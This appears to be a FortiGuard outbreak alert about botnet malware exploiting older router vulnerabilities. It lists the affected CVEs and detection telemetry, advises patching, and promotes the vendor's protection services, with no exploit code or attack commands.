Router Malware Attack
Highly targeted router vulnerabilities
FortiGuard Labs has observed various router vulnerabilities being exploited in the wild to distribute malware such as MooBot Malware, Lucifer Malware, BotenaGo Botnet, Zerobot Malware, Enemybot Malware. Learn More »
Common Vulnerabilities and Exposures
CVE-2023-26801
CVE-2023-26802
CVE-2023-27076
CVE-2019-10891
CVE-2018-10562
CVE-2018-10561
CVE-2015-2051
Background
Dec 06, 2021: FortiGuard Labs posted a blog about MooBot Malware analyzing how Moobot targets Hikvision Camera vulnerability. April 12, 2022: FortiGuard Labs posted a blog about Enemybot Malware and how it targets various router vulnerabilities such as Netgear, D-Link etc. Jan 27, 2022: FortiGuard Labs released a Threat Signal on BotenaGo Malware which targets multiple IoT devices. Dec 27, 2022: FortiGuard Labs released an Outbreak Alert about Zerobot Malware which spreads primarily through IoT and web application vulnerabilities. Please go to Additional Resources section for links to blog posts, threat signal and outbreak alert mentioned above.
Threat Radar Overall Score: 4.4
CVSS Rating | 9.0 | |
FortiRecon Score | 92/100 | |
Known Exploited | Yes | |
Exploit Prediction Score | 97.42% | |
FortiGuard Telemetry | 80386 |
Latest Development
Recent news and incidents related to cybersecurity threats encompassing various events such as data breaches, cyber-attacks, security incidents, and vulnerabilities discovered.
In Jan, 2023: FortiGuard Labs observed severe IPS detections (peak of up-to 50,000 unique IPS devices) and associated malware activity exploiting older router vulnerabilities. In particular, MooBot and Enemybot Malware targeting D-Link routers (CVE-2015-2051) and Lucifer Malware, BotenaGo Botnet and Zerobot Malware exploiting vulnerabilities on unpatched Dasan GPON home routers (CVE-2018-10562, CVE-2018-10561).
FortiGuard Labs recommends upgrading the vulnerable routers to latest firmware and discontinue using end-of-life products if still in use. FortiGuard labs has already released multiple IPS and AV protections to block such attack attempts for our customers.
In June 2023: FortiGuard observed upto 18,000+ IPS devices that blocked attack attempts affecting some Zyxel CPE models. Zyxel has released firmware updates for RCE and DoS vulnerabilities which does not have assigned CVE number as of now. https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-code-execution-and-denial-of-service-vulnerabilities-of-cpe
FortiGuard Labs also observed CVE-2023-26801, a vulnerability affecting LB-LINK devices targeted by the attackers and we see IPS detections of upto 5000+ devices.
With popularity of `Work from Anywhere`, company`s employees can get compromised easily if they are using vulnerable home router devices. Fortinet Zero Trust Access solutions provide continuous verification of all users, devices and checks for device posture as they access corporate applications and data. https://www.fortinet.com/solutions/enterprise-midsize-business/network-access/application-access
FortiGuard Cybersecurity Framework
Mitigate security threats and vulnerabilities by leveraging the range of FortiGuard Services.
-
AV
-
AV (Pre-filter)
-
IPS
-
Outbreak Detection
-
Threat Hunting
-
Content Update
-
Automated Response
-
Assisted Response Services
-
InfoSec Services
-
Attack Surface Monitoring (Inside & Outside)
AV Detects and blocks malware related to Router Malware Attack
AV (Pre-filter) Detects and blocks malware related to Router Malware Attack
IPS Detects and blocks attack attempts related to Router vulnerabilities (CVE-2019-10891, CVE-2018-10562, CVE-2018-10561, CVE-2015-2051)
Outbreak Detection
Threat Hunting
Content Update
Automated Response Services that can automaticlly respond to this outbreak.
FortiClient Forensics
Assisted Response Services Experts to assist you with analysis, containment and response activities.
InfoSec Services Security readiness and awareness training for SOC teams, InfoSec and general employees.
Attack Surface Monitoring (Inside & Outside) Security reconnaissance and penetration testing services, covering both internal & external attack vectors, including those introduced internally via software supply chain.
Threat Intelligence
Information gathered from analyzing ongoing cybersecurity events including threat actors, their tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), malware and related vulnerabilities.
Loading ...
Indicators of compromise
IOC Indicator List
Indicators of compromise
IOC Threat Activity
Last 30 days
Chg
Avg 0
Mitre Matrix
Click here for the ATT&CK Matrix
References
Sources of information in support and relation to this Outbreak and vendor.